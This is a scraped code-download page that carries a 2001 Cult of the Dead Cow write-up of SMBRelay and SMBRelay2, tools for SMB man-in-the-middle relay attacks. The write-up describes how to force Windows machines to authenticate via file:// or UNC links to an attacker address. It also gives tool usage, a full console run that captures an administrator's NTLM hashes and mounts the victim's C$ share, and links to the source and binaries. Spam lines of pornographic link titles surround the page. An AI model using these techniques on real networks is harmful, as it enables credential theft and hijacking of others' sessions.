亚洲欧美第一页_禁久久精品乱码_粉嫩av一区二区三区免费野_久草精品视频

? 歡迎來到蟲蟲下載站! | ?? 資源下載 ?? 資源專輯 ?? 關于我們
? 蟲蟲下載站

?? smbrelay.html

?? 通過監聽其他機器上139端口發來的smb連接請求來得到登錄密碼的程序例子
?? HTML
字號:
<HTML>
<HEAD>
<title>The SMB Man-In-the-Middle Attack</title>

</HEAD>
<BODY bgcolor="#000000" text="#FFFFFF" link="#FF0000" alink="#FF0000" vlink="#CC0000">
<BR>
<BR>

<P>
This topic was discussed on March 31 2001 at <A href =
"http://www.atlantacon.com"> @lanta.con </A> in Atlanta, Georgia.
</P>

<HR>

<P>
Because Windows automatically tries to log in as the current 
user if no other authentication information is explicitly 
supplied, if an attacker can force a NetBIOS connection from
its target it can retrieve the user authentication 
information of the currently logged in user. L0pht Crack's FAQ mentions 
this as a way to retrieve password hashes from remote networks 
for cracking.  There are a number of ways to force a Windows 
machine to establish a NetBIOS connection, their FAQ reccomends 
sending an email with a link to file://1.2.3.4/share/whatever.html 
so that if the user clicks on it, it connects to 1.2.3.4's NetBIOS 
server as the currently logged in user transmitting the hashed 
password information.
</P>

<P>
It is actually very easy to force a NetBIOS connection, simply have
any web browser or IE API (WinInet) based app view html that 
includes an image with a source URL like 
file://1.2.3.4/share/whatever.gif
or use NBNAME /RESPOND to return the attacker's IP address in 
response to name queries, find a remotely accessible service 
(such as ftp server or http server) that doesn't properly parse 
or check user supplied paths or filenames and supply it with a 
filename like \\1.2.3.4\share\whatever.gif, and I'm sure there 
are many other ways yet to be discovered/revealed.  
</P>

<P>
Man in the middle attacks are an old concept. However, 
when a target host can be forced to authenticate
with an attacker and the credentials used are also valid 
on the server portion of the target, it becomes possible to 
gain access to that server as whatever user the target's 
client is trying to authenticate as.  This is accomplished 
by acting as a man in the middle to both the server and the 
client portions of the target.  This same method could be 
use to gain access to any server the authentication 
information issued by the target client is valid on 
(for instance, any other server in the same domain).
After the authentication has been completed, the target's client is 
disconnected and the attacker remains connected to the target's server 
as whatever user the target is logged in as, hijacking the connection.
</P>

<P>
SMB uses a challenge-response method of authentication to prevent replay
attacks and complicate cracking.  The challenge is 8 bytes of randomly
generated data which the client encrypts using the password as an
encryption key.  The negotiation flow is usually like this:

<PRE>
Client->Server
Session request, workstation service requests connection to server
service.
Server->Client
Session response, yes that NetBIOS name is connectable here.
Client->Server
Negotiation, which dialect do you want to speak with me?
Server->Client
Dialect selection, let's speak this dialect.  Here's the challenge data to
encrypt with your password.
Client->Server
Session setup, here's my username and your challenge encrypted
with the password hash I want to logon as.
Server->Client
Session setup response, yes ok you are connected as that user.
</PRE>

<P>
To gain access to a server once a NetBIOS connection has been received
from a target client, the flow would be:
</P>

<PRE>
Target client->Attacker
Session request, workstation service requests connection to some server
name.
Attacker->Target server
Session request, some workstation requests connection to server service.
Target Server->Attacker
Session response, yes you can connect to that name.
Attacker->Target client
Session response, yes you can connect to that name.
Target client->Attacker
Negotiation, which dialect do you want to talk?
Attacker->Target server
Negotiation, would you like to talk to me as if I'm an NT 4 box without
extended security?
Target server->Attacker
Dialect selection, ok let's talk that way, here's my challenge.
Attacker->Target client
Dialect selection, let's speak this way, here's a challenge.
Target client->Attacker
Session setup, here's my username and password encrypted with your
challenge.
Attacker->Target server
Session setup, here's the username and encrypted password I want to logon
as.
Target server->Attacker
Session setup response, ok you are connected now.
Attacker->Target client
*snip*
Attacker->Target server
(Attacker does whatever the target client user can do)
</PRE>


<P>
Once connected, a target can verify the relayed connection using:
</P>

<PRE>


net session


</PRE>



<HR>
<HR>

<H3>SMBRelay</H3>

<P>
Smbrelay is a program that receives a connection on port 139, connects 
back to the connecting computer's port 139, and relays the packets between 
the client and server of the connecting Windows machine, making modifications
to these packets when necessary.  
</P>

<P>
After connecting and authenticating it disconnects the target's client
and binds to port 139 on a new IP address.  This IP address (the relay
address) can then be connected to directly from windows using 
<BR>
"net use \\192.1.1.1"
<BR>
and then used by all of the networking built into Windows.  It relays 
all the SMB trafic, except for the negotiation and authentication.  You can 
disconnect from and reconnect to this virtual IP as long as the target 
host stays connected.
</P>

<P>
SMBRelay is multi-threaded and handles multiple connections simultaneously.
It will create new IP addresses sequentially, removing them when the target
host disconnects.  It will not allow the same IP address to connect twice, 
unless a successful connection to that target was achieved and disconnected.
If this happens, it may use the same same relay address again for another
connection.
</P>

<P>
SMBRelay collects the NTLM password hashes transmitted and writes them to
hashes.txt in a format usable by L0phtcrack so the passwords can be
cracked later.
</P>

<PRE>
Usage: smbrelay [options]
 Options:
  /D num   - Set debug level, current valid levels: 0 (none), 1, 2
    Defaults to 0
  /E       - Enumerates interfaces and their indexes
  /IL num  - Set the interface index to use when adding local IP addresses
  /IR num  - Set the interface index to use when adding relay IP addresses
    Defaults to 1.  Use /E to display the adapter indexes 
  /L[+] IP - Set the local IP to listen on for incoming NetBIOS connections
    Use + to first add the IP address to the NIC
    Defaults to primary host IP
  /R[-] IP - Set the starting relay IP address to use
    Use - to NOT first add each relay IP address to the NIC
    Defaults to 192.1.1.1
  /S name  - Set the source machine name
    Defaults to CDC4EVER



c:\>smbrelay /I 2 /D 1

SMBRelay v0.98 - TCP (NetBT) level SMB man-in-the-middle relay attack
 Copyright 2001: Sir Dystic, Cult of the Dead Cow
 Send complaints, ideas and donations to sirdystic@cultdeadcow.com
Bound to port 139 on address 11.11.11.11
Connection from 60.61.62.63:1140
Request type: Session Request  72 bytes
Source name: BOB             <00>
Target name: *SMBSERVER      <20>
Setting target name to source name and source name to 'CDC4EVER'...Response:
 Positive Session Response  4 bytes

Request type: Session Message  174 bytes
SMB_COM_NEGOTIATE
Response:     Session Message  99 bytes
Challenge (8 bytes):    268B11C361473D20

Request type: Session Message  278 bytes
SMB_COM_SESSION_SETUP_ANDX
Password lengths: 24 24
Case insensitive password:  59A8A04CC37D226F0AC44065C84FDF9FEB1BB611C3CBE936
Case sensitive password:    8BA548AF1F9A517BBFBEF4E53D1D8B5D94E81C5523E7B251
Username:     "administrator"
Domain:       "BOB"
OS:           "Windows NT 1381"
Lanman type:  ""
Response:     Session Message  148 bytes
OS:           "Windows NT 4.0"
Lanman type:  "NT LAN Manager 4.0"
Domain:       "BOBSMITH"

Password hash written to disk
Connected?
Bound to port 139 on address 192.1.1.1 relaying for host BOB 60.61.62.63

>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

D:\>net use \\192.1.1.1
The command completed successfully.

>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

*** Relay connection for target BOB received from 11.11.11.11:1472
Relay request type: Session Request  72 bytes, 72 target BOB
 *** Sent positive session response for relay target BOB
Relay request type: Session Message  174 bytes, 174 target BOB
BOB:SMB_COM_NEGOTIATE 174 bytes
0 - Dialect 2 - PC NETWORK PROGRAM 1.0
1 - Dialect 2 - XENIX CORE
2 - Dialect 2 - MICROSOFT NETWORKS 1.03
3 - Dialect 2 - LANMAN1.0
4 - Dialect 2 - Windows for Workgroups 3.1a
5 - Dialect 2 - LM1.2X002
6 - Dialect 2 - LANMAN2.1
 *** Sent dialect selection response (7) for target BOB
Relay request type: Session Message  260 bytes, 260 target BOB
BOB:SMB_COM_SESSION_SETUP_ANDX 260 bytes
 *** Sent SMB Session setup response for relay to BOB

>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

D:\>net use z: \\192.1.1.1\c$
The command completed successfully.

>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

Relay request type: Session Message  136 bytes, 136 target BOB
BOB:SMB_COM_SESSION_SETUP_ANDX 136 bytes
Received 132 byte response from target BOB
Relay request type: Session Message  81 bytes, 81 target BOB
BOB:SMB_COM_TREE_CONNECT_ANDX 81 bytes
Received 56 byte response from target BOB
Received request header, expecting 4 bytes for target BOB
Relay request type: Session Keep Alive  4 bytes, 4 target BOB

>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

D:\>net use * /d /y
The command completed successfully.

>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

Relay request type: Session Message  39 bytes, 39 target BOB
BOB:SMB_COM_TREE_DISCONNECT 39 bytes
Received 39 byte response from target BOB
Relay request type: Session Message  39 bytes, 39 target BOB
BOB:SMB_COM_TREE_DISCONNECT 39 bytes
Received 39 byte response from target BOB
Relay request type: Session Message  43 bytes, 43 target BOB
BOB:SMB_COM_LOGOFF_ANDX 43 bytes
 *** Logoff from target BOB
 *** Relay disconnected from target BOB
Bound to port 139 on address 192.1.1.1 relaying for host BOB 60.61.62.63
Deleted relay IP address 192.1.1.1 for target BOB
*** Target BOB Disconnected

>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

</PRE>

<HR>
<HR>
Notes on using SMBRelay:<BR>
<P>
SMBRelay must first bind to port 139 to receive the incoming NetBIOS
connections.  First of all, because this port is below 1024 it is a
priveleged port and requires administrator access to use.  Administrator
access is also required to add and remove IP addresses which SMBRelay does
in its normal mode of operation.  So SMBRELAY MUST RUN AS AN ADMINISTRATOR
ACCESS ACCOUNT.
</P>

<P>
SMBRelay targets and runs best on Windows NT and 2000
machines.  Connections from 9x and ME boxes will have unpredictable
results.  
</P>

<P>
On Win2K SMBRelay will not be able to bind to port 139 if the system is
already using it because of a new socket flag Microsoft added to
specifically prevent other applications from re-using a port the system is
using.  The easiest thing to do is to use the /L+ option to create a new
IP address on your NIC and have the target connect to that address rather
than your primary.  Another way is to manually add a new IP address
through your control panel and then use /L to specify that address.
</P>

<P>
SMBRelay will bind in front of the OS on port 139 if it can, but just
because it is able to bind successfully doesn't mean that the program will
actually receive the incomming connections.  If there are any existing
connections to the system (even in the TIME_WAIT state) when SMBRelay
binds to the port, it will probably not receive any of the
connections.  Under Windows 98 it never seems to receive any
connections.  Under Windows NT, even under best circumstances it only
sometimes receives the connections.  Because of this I usually run several
coppies of SMBRelay hopefully increasing the chances of SMBRelay getting
the connections instead of the system.  Under Windows 2000 the OS prevents
SMBRelay from binding to the port while the OS is using it.
</P>

</P>


<P> 
To create a new IP address on your computer, you must specify the
interface index of the adapter to use using the /IR and/or /IL options.  
Use /E to list the interface indexes available. Under NT the indexes are
nice simple numbers, but under 2K they use high bits so the indexes are
represented as hex numbers.  If you do not use the /IR option to set the
relay interface it will default to 1, which is usually the loopback
interface.  This will allow you to connect only from your own box. 
</P>

<P>
SMBRelay should run on an NT or 2K box, but MAY run on a 98 box if it is
cconfigured correctly.  However, the relaying may not work for a 98 box.
</P>

<P>
The FIRST thing that must be done to connect to the relay address is:
<BR>
NET USE \\192.1.1.1
<BR>
After that you can do anything else to the target directly through Windows
networking using the relay IP address host name (like \\192.1.1.1).
</P>


<HR>
<HR>
<A href = "smbrelay.cpp">SMBRelay Win32 source</A>
<HR>
<A href = "smbrelay.exe">SMBRelay Win32 binary</A>
<HR>
<HR>


<H3>SMBRelay2</H3>

<P>
SMBRelay2 works at the NetBIOS level, and should work across any protocol 
NetBIOS is bound to (such as NetBEUI or TCP/IP).  Rather than using IP 
addresses, SMBRelay2 uses NetBIOS names.  It also supports mitm'ing to a 
third host.  However, it currently supports listening on only one name, so
the target must attempt to connect to that name for SMBRelay2 to operate
(the local name), so the target must attempt to access a resource on 
LocalName.
</P>

<PRE>
SMBRelay2 v.98 - NetBIOS level SMB man-in-the-middle relay attack
SMBRelay2 [Options]
 Options:
  /A LanaNum     - Use LanaNum
                    Defaults to 0
  /D DebugLevel  - Level of debug messages, valid levels 0 - 3
                    Defaults to 0
  /L LocalName   - Listen for primary connection on LocalName
                    Defaults to SERVER
  /R RelayName   - Listen for relay connection on RelayName
                    Defaults to RELAY
  /S SourceName  - Use SourceName when connecting to target
                    Defaults to CDC4EVER
  /T TargetName  - Connect to TargetName for relay
                    Defaults to connecting back to client
</PRE>


<HR>
<HR>
<A href = "smbrelay2.cpp">SMBRelay2 Win32 source</A>
<HR>
<A href = "smbrelay2.exe">SMBRelay2 Win32 binary</A>
<HR>
<HR>

</BODY>
</HTML>

?? 快捷鍵說明

復制代碼 Ctrl + C
搜索代碼 Ctrl + F
全屏模式 F11
切換主題 Ctrl + Shift + D
顯示快捷鍵 ?
增大字號 Ctrl + =
減小字號 Ctrl + -
亚洲欧美第一页_禁久久精品乱码_粉嫩av一区二区三区免费野_久草精品视频
国产精品美女久久福利网站| 国产精品久久三区| 成人精品高清在线| 香蕉乱码成人久久天堂爱免费| 国产日韩欧美不卡在线| 4438成人网| 在线观看日产精品| 国产jizzjizz一区二区| 青草国产精品久久久久久| 亚洲三级在线播放| 国产欧美1区2区3区| 日韩视频免费观看高清完整版在线观看| 99精品在线观看视频| 精品一区二区三区免费播放| 亚洲成a人片在线观看中文| 亚洲天堂福利av| 国产欧美一区二区三区在线看蜜臀 | 欧美丰满美乳xxx高潮www| 成人妖精视频yjsp地址| 精久久久久久久久久久| 日韩影视精彩在线| 亚洲午夜在线视频| 亚洲精品免费在线观看| 中文字幕中文字幕在线一区| 久久久精品综合| 日韩免费电影一区| 91精品蜜臀在线一区尤物| 在线观看免费亚洲| 欧洲一区在线观看| 91视频观看免费| 99精品国产热久久91蜜凸| a亚洲天堂av| 99精品欧美一区二区蜜桃免费| 成人av电影在线观看| 成人妖精视频yjsp地址| 春色校园综合激情亚洲| 丁香桃色午夜亚洲一区二区三区| 国产91在线|亚洲| 国产91色综合久久免费分享| 国产精品一区不卡| 不卡一区二区三区四区| 成人app软件下载大全免费| 成人综合婷婷国产精品久久| 成人免费看片app下载| 暴力调教一区二区三区| 91丨九色丨蝌蚪富婆spa| 色综合天天狠狠| 欧洲一区二区三区免费视频| 欧美精品123区| 91精品午夜视频| 欧美精品一区二区三区四区| 久久综合999| 国产精品久久99| 亚洲欧美视频一区| 亚洲国产成人av| 麻豆91在线看| 国产福利一区二区| 91香蕉视频mp4| 欧美久久久久久蜜桃| 日韩三级中文字幕| 国产欧美一区二区精品性色超碰| 亚洲日本中文字幕区| 亚洲va中文字幕| 久久成人18免费观看| 成人动漫在线一区| 欧美视频你懂的| 精品国产精品一区二区夜夜嗨| 久久久www成人免费毛片麻豆| 国产精品欧美一级免费| 亚洲国产成人av网| 国产中文字幕精品| 色综合久久精品| 欧美一卡2卡三卡4卡5免费| 久久精品夜夜夜夜久久| 亚洲激情成人在线| 久久超碰97人人做人人爱| 99精品偷自拍| 精品少妇一区二区三区在线播放 | 91视频你懂的| 日韩三级视频在线看| 中文字幕精品一区二区精品绿巨人 | 欧美精品一区二区在线观看| 国产精品人妖ts系列视频| 亚洲成a人v欧美综合天堂| 国产精品一线二线三线精华| 欧美在线影院一区二区| 久久久久综合网| 日日欢夜夜爽一区| 岛国av在线一区| 日韩精品一区二区三区中文精品| 国产精品不卡视频| 久久99久久99精品免视看婷婷 | 国产精品自拍三区| 欧美区在线观看| 18欧美亚洲精品| 极品少妇xxxx偷拍精品少妇| 91丨九色丨蝌蚪丨老版| 国产香蕉久久精品综合网| 日韩电影一区二区三区四区| 91麻豆6部合集magnet| 亚洲精品一区二区三区蜜桃下载| 亚洲一区av在线| 成人av免费网站| 久久久不卡影院| 青青草国产精品亚洲专区无| 在线亚洲人成电影网站色www| 国产欧美精品一区二区三区四区| 日韩1区2区日韩1区2区| 欧美午夜精品一区二区三区| 中文字幕国产一区二区| 九九精品一区二区| 欧美电影在哪看比较好| 亚洲一区在线观看视频| 91香蕉视频mp4| 国产精品高清亚洲| 国产精品一区二区久久精品爱涩| 欧美一级淫片007| 天堂成人免费av电影一区| 一本大道久久a久久综合婷婷| 国产精品伦理一区二区| 国产999精品久久| 国产精品网曝门| 国产成人av一区二区三区在线| 精品日韩在线一区| 免费一级欧美片在线观看| 欧美群妇大交群的观看方式| 亚洲午夜视频在线| 欧美伦理影视网| 天天综合色天天综合| 欧美男人的天堂一二区| 亚洲图片欧美综合| 精品视频在线视频| 天天影视色香欲综合网老头| 欧美电影在线免费观看| 三级欧美在线一区| 日韩一区二区三区在线观看| 日韩av一区二区三区四区| 欧美一区二区三级| 另类综合日韩欧美亚洲| 欧美精品一区二| 丁香天五香天堂综合| 1024国产精品| 欧美在线观看视频在线| 亚洲电影欧美电影有声小说| 欧美私人免费视频| 日本不卡视频一二三区| 26uuu国产一区二区三区| 国产成人啪午夜精品网站男同| 国产精品毛片久久久久久| 99精品视频在线观看免费| 亚洲小说欧美激情另类| 欧美精品久久天天躁| 久久99精品久久只有精品| 久久蜜桃一区二区| 97成人超碰视| 亚洲成人av在线电影| 日韩精品一区二区三区swag | www.久久精品| 亚洲一二三四久久| 日韩一级完整毛片| 国产一区二区不卡在线| 国产精品不卡在线| 欧美老肥妇做.爰bbww视频| 老鸭窝一区二区久久精品| 精品国产乱码久久久久久浪潮| 国产一区二区成人久久免费影院 | 欧美在线三级电影| 麻豆精品一区二区av白丝在线| 久久久久一区二区三区四区| 色综合久久综合| 男男gaygay亚洲| 中文字幕中文在线不卡住| 欧美日韩精品三区| 成人午夜短视频| 午夜精品一区二区三区电影天堂| 精品国产亚洲在线| 日本高清不卡视频| 免费成人美女在线观看| 日韩理论片中文av| 91精品国产综合久久香蕉的特点 | 成人影视亚洲图片在线| 亚洲国产成人tv| 欧美激情中文字幕| 欧美日韩久久不卡| 日韩一区二区视频| 成人av在线一区二区| 美女网站视频久久| 亚洲美女在线一区| 国产欧美一区二区三区网站| 51精品视频一区二区三区| 99久久综合精品| 精品在线视频一区| 亚洲第一搞黄网站| 国产精品网友自拍| 久久综合色综合88| 精品1区2区3区| 99re这里只有精品6| 国产一区二区在线观看视频| 一区二区理论电影在线观看| 久久久精品tv|